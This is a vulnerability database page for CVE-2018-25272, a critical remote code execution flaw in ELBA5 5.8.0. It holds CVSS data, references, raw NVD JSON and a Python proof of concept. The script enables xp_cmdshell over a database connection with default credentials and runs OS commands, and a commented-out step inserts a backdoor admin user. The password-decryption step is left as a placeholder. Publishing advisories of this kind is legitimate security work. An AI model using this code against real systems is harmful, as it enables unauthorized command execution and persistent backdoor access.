CVE-2018-25272

Description

ELBA5 5.8.0 contains a remote code execution vulnerability that allows attackers to obtain database credentials and execute arbitrary commands with SYSTEM level permissions. Attackers can connect to the database using default connector credentials, decrypt the DBA password, and execute commands via the xp_cmdshell stored procedure or add backdoor users to the BEDIENER table.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

ELBA5 5.8.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import pymssql

# Configuration
host = 'TARGET_IP'
user = 'DEFAULT_CONNECTOR_USER' # e.g. 'elba_user'
password = 'DEFAULT_CONNECTOR_PASS'
db_name = 'ELBA_DB'

def exploit():
    try:
        # Step 1: Connect using default connector credentials
        print(f"[*] Connecting to {host}...")
        conn = pymssql.connect(host, user, password, db_name)
        cursor = conn.cursor()
        print("[+] Connection established!")

        # Step 2: Decrypt DBA password (Logic depends on specific implementation)
        # Assuming we retrieved and decrypted the DBA password
        dba_password = "decrypted_dba_password"
        print("[+] DBA password decrypted/obtained.")

        # Step 3: Reconnect as DBA or execute commands if current user has rights to enable xp_cmdshell
        # In this scenario, we assume the connector user has rights to escalate or we switch context
        
        # Enable xp_cmdshell
        enable_cmd = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
        cursor.execute(enable_cmd)
        conn.commit()
        print("[+] xp_cmdshell enabled.")

        # Step 4: Execute arbitrary command
        cmd_to_exec = 'whoami'
        sql_cmd = f"EXEC master..xp_cmdshell '{cmd_to_exec}'"
        print(f"[*] Executing command: {cmd_to_exec}")
        cursor.execute(sql_cmd)
        
        rows = cursor.fetchall()
        for row in rows:
            print(row[0])

        # Step 5: Add backdoor user to BEDIENER table
        # add_user_sql = "INSERT INTO BEDIENER (username, password, is_admin) VALUES ('hacker', 'password', 1)"
        # cursor.execute(add_user_sql)
        # conn.commit()
        # print("[+] Backdoor user added.")

        conn.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25272
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25272
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25272/
[4] VulDB https://vuldb.com/cve/CVE-2018-25272
[5] https://www.elba.at
[6] https://www.exploit-db.com/exploits/45905
[7] https://www.vulncheck.com/advisories/elba5-remote-code-execution-via-database-access

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25272", "sourceIdentifier": "[email protected]", "published": "2026-04-22T16:16:48.143", "lastModified": "2026-04-29T20:46:33.890", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ELBA5 5.8.0 contains a remote code execution vulnerability that allows attackers to obtain database credentials and execute arbitrary commands with SYSTEM level permissions. Attackers can connect to the database using default connector credentials, decrypt the DBA password, and execute commands via the xp_cmdshell stored procedure or add backdoor users to the BEDIENER table."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-326"}]}], "references": [{"url": "https://www.elba.at", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/45905", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/elba5-remote-code-execution-via-database-access", "source": "[email protected]"}]}}